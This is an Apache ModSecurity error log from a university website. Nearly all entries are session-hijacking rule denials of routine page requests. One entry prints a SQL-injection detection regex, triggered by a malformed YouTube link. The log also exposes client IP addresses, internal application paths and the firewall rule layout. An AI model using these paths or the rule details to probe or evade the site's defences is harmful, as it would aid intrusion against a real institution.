[Mon Aug 28 06:51:33.261532 2023] [:error] [pid 37418] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/examples.css"] [unique_id "ZOvhhcCo-f0AAJIqOH0AAAAT"]
[Mon Aug 28 06:51:33.276650 2023] [:error] [pid 37313] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/tabs.css"] [unique_id "ZOvhhcCo-f0AAJHB37EAAAAD"]
[Mon Aug 28 06:51:33.285208 2023] [:error] [pid 37421] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/icons/silk.css"] [unique_id "ZOvhhcCo-f0AAJIt8qAAAAAW"]
[Mon Aug 28 06:51:33.306354 2023] [:error] [pid 37312] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/adapter/ext/ext-base.js"] [unique_id "ZOvhhcCo-f0AAJHAkDEAAAAY"]
[Mon Aug 28 06:51:33.318148 2023] [:error] [pid 37420] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/treegrid/treegrid.css"] [unique_id "ZOvhhcCo-f0AAJIsP4UAAAAV"]
[Mon Aug 28 06:51:33.431522 2023] [:error] [pid 37451] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ext-all.js"] [unique_id "ZOvhhcCo-f0AAJJLpj0AAAAA"]
[Mon Aug 28 06:51:33.536310 2023] [:error] [pid 37401] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/store/DataMasterPublic.js"] [unique_id "ZOvhhcCo-f0AAJIZRo0AAAAF"]
[Mon Aug 28 06:51:33.646886 2023] [:error] [pid 37407] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/pendaftaran/verifikasipmb_form.js"] [unique_id "ZOvhhcCo-f0AAJIfRKQAAAAN"]
[Mon Aug 28 06:51:33.740029 2023] [:error] [pid 37312] [client 101.128.68.106] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvhhcCo-f0AAJHAkDIAAAAY"]
[Mon Aug 28 06:51:33.751999 2023] [:error] [pid 37407] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/find_m.js"] [unique_id "ZOvhhcCo-f0AAJIfRKUAAAAN"]
[Mon Aug 28 06:51:33.906560 2023] [:error] [pid 37451] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/Ext.ux.grid.Search.js"] [unique_id "ZOvhhcCo-f0AAJJLpj8AAAAA"]
[Mon Aug 28 06:51:34.026935 2023] [:error] [pid 37465] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/ux/form/NumberField.js"] [unique_id "ZOvhhsCo-f0AAJJZZlsAAAAE"]
[Mon Aug 28 06:51:34.116467 2023] [:error] [pid 37407] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/application/frontend/website/ftracerstudy.js"] [unique_id "ZOvhhsCo-f0AAJIfRKYAAAAN"]
[Mon Aug 28 06:51:34.527094 2023] [:error] [pid 37416] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOvhhsCo-f0AAJIoaIgAAAAR"]
[Mon Aug 28 06:51:42.592315 2023] [:error] [pid 37416] [client 101.128.69.94] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvhjsCo-f0AAJIoaJIAAAAR"]
[Mon Aug 28 06:51:56.291142 2023] [:error] [pid 37465] [client 103.119.55.58] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvhnMCo-f0AAJJZZnoAAAAE"]
[Mon Aug 28 06:52:10.819871 2023] [:error] [pid 37407] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOvhqsCo-f0AAJIfRNgAAAAN"]
[Mon Aug 28 06:52:10.940750 2023] [:error] [pid 37312] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhqsCo-f0AAJHAkGQAAAAY"]
[Mon Aug 28 06:52:12.985748 2023] [:error] [pid 37418] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvhrMCo-f0AAJIqOM0AAAAT"]
[Mon Aug 28 06:52:13.088149 2023] [:error] [pid 37401] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhrcCo-f0AAJIZRskAAAAF"]
[Mon Aug 28 06:52:14.120288 2023] [:error] [pid 37401] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvhrsCo-f0AAJIZRssAAAAF"]
[Mon Aug 28 06:52:14.199956 2023] [:error] [pid 37407] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhrsCo-f0AAJIfRN8AAAAN"]
[Mon Aug 28 06:52:15.320232 2023] [:error] [pid 37313] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhr8Co-f0AAJHB3-YAAAAD"]
[Mon Aug 28 06:52:16.162279 2023] [:error] [pid 37499] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhsMCo-f0AAJJ7KRcAAAAB"]
[Mon Aug 28 06:52:16.820135 2023] [:error] [pid 37313] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhsMCo-f0AAJHB3-cAAAAD"]
[Mon Aug 28 06:52:20.753157 2023] [:error] [pid 37401] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhtMCo-f0AAJIZRtIAAAAF"]
[Mon Aug 28 06:52:21.443104 2023] [:error] [pid 37312] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhtcCo-f0AAJHAkHIAAAAY"]
[Mon Aug 28 06:52:22.115468 2023] [:error] [pid 37312] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvhtsCo-f0AAJHAkHQAAAAY"]
[Mon Aug 28 06:52:22.192737 2023] [:error] [pid 37426] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhtsCo-f0AAJIyVSkAAAAc"]
[Mon Aug 28 06:52:22.733160 2023] [:error] [pid 37312] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhtsCo-f0AAJHAkHcAAAAY"]
[Mon Aug 28 06:52:23.221875 2023] [:error] [pid 37499] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvht8Co-f0AAJJ7KSQAAAAB"]
[Mon Aug 28 06:52:23.715464 2023] [:error] [pid 37312] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvht8Co-f0AAJHAkHsAAAAY"]
[Mon Aug 28 06:52:35.209722 2023] [:error] [pid 37312] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvhw8Co-f0AAJHAkJ4AAAAY"]
[Mon Aug 28 06:52:35.287381 2023] [:error] [pid 37401] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhw8Co-f0AAJIZRvgAAAAF"]
[Mon Aug 28 06:52:40.665472 2023] [:error] [pid 37426] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvhyMCo-f0AAJIyVVYAAAAc"]
[Mon Aug 28 06:52:40.773422 2023] [:error] [pid 37312] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhyMCo-f0AAJHAkKkAAAAY"]
[Mon Aug 28 06:52:41.811327 2023] [:error] [pid 37420] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhycCo-f0AAJIsP-0AAAAV"]
[Mon Aug 28 06:52:42.632102 2023] [:error] [pid 37465] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhysCo-f0AAJJZZsgAAAAE"]
[Mon Aug 28 06:53:30.679226 2023] [:error] [pid 37426] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvh@sCo-f0AAJIyVb0AAAAc"]
[Mon Aug 28 06:53:30.680161 2023] [:error] [pid 37407] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvh@sCo-f0AAJIfRXkAAAAN"]
[Mon Aug 28 06:53:30.799922 2023] [:error] [pid 37465] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvh@sCo-f0AAJJZZxMAAAAE"]
[Mon Aug 28 06:54:59.409325 2023] [:error] [pid 37418] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOviU8Co-f0AAJIqOioAAAAT"]
[Mon Aug 28 06:54:59.411921 2023] [:error] [pid 37465] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOviU8Co-f0AAJJZZ9QAAAAE"]
[Mon Aug 28 06:54:59.420818 2023] [:error] [pid 37499] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOviU8Co-f0AAJJ7Kh4AAAAB"]
[Mon Aug 28 06:54:59.422491 2023] [:error] [pid 37416] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOviU8Co-f0AAJIoagoAAAAR"]
[Mon Aug 28 06:54:59.423069 2023] [:error] [pid 37407] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOviU8Co-f0AAJIfRiIAAAAN"]
[Mon Aug 28 06:54:59.424597 2023] [:error] [pid 37313] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOviU8Co-f0AAJHB4UMAAAAD"]
[Mon Aug 28 06:54:59.473501 2023] [:error] [pid 37451] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOviU8Co-f0AAJJLp3sAAAAA"]
[Mon Aug 28 06:54:59.509600 2023] [:error] [pid 37313] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOviU8Co-f0AAJHB4UQAAAAD"]
[Mon Aug 28 06:54:59.521410 2023] [:error] [pid 37499] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOviU8Co-f0AAJJ7Kh8AAAAB"]
[Mon Aug 28 06:54:59.538804 2023] [:error] [pid 37407] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOviU8Co-f0AAJIfRiMAAAAN"]
[Mon Aug 28 06:54:59.682632 2023] [:error] [pid 37407] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOviU8Co-f0AAJIfRiQAAAAN"]
[Mon Aug 28 06:54:59.876950 2023] [:error] [pid 37465] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOviU8Co-f0AAJJZZ9YAAAAE"]
[Mon Aug 28 06:56:23.210708 2023] [:error] [pid 37407] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/fisip/kepolisian"] [unique_id "ZOvip8Co-f0AAJIfRmoAAAAN"]
[Mon Aug 28 06:56:23.502440 2023] [:error] [pid 37418] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvip8Co-f0AAJIqOtwAAAAT"]
[Mon Aug 28 06:56:26.386405 2023] [:error] [pid 37418] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/fisip/kepolisian"] [unique_id "ZOviqsCo-f0AAJIqOuQAAAAT"]
[Mon Aug 28 06:56:26.533492 2023] [:error] [pid 37426] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOviqsCo-f0AAJIyVzcAAAAc"]
[Mon Aug 28 06:56:31.164241 2023] [:error] [pid 37426] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/fisip/kepolisian"] [unique_id "ZOvir8Co-f0AAJIyV0EAAAAc"]
[Mon Aug 28 06:56:31.290266 2023] [:error] [pid 37418] [client 36.79.212.42] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvir8Co-f0AAJIqOu4AAAAT"]
[Mon Aug 28 06:59:39.920519 2023] [:error] [pid 37418] [client 84.46.245.24] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:v. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:v: oD1MJBggCZA\\x5c\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/2021/01/05/webinar-nasional-teknik-sipil-universitas-langlangbuana-tahap-ke-2/\\"https:/www.youtube.com/watch"] [unique_id "ZOvja8Co-f0AAJIqO9YAAAAT"]
[Mon Aug 28 07:00:11.398956 2023] [:error] [pid 37312] [client 66.249.70.169] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/c_mastah/grid_vstsemester"] [unique_id "ZOvji8Co-f0AAJHAkvgAAAAY"]
[Mon Aug 28 07:02:42.857343 2023] [:error] [pid 37418] [client 123.253.233.84] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/index.php/c_tools/get_user"] [unique_id "ZOvkIsCo-f0AAJIqO98AAAAT"]
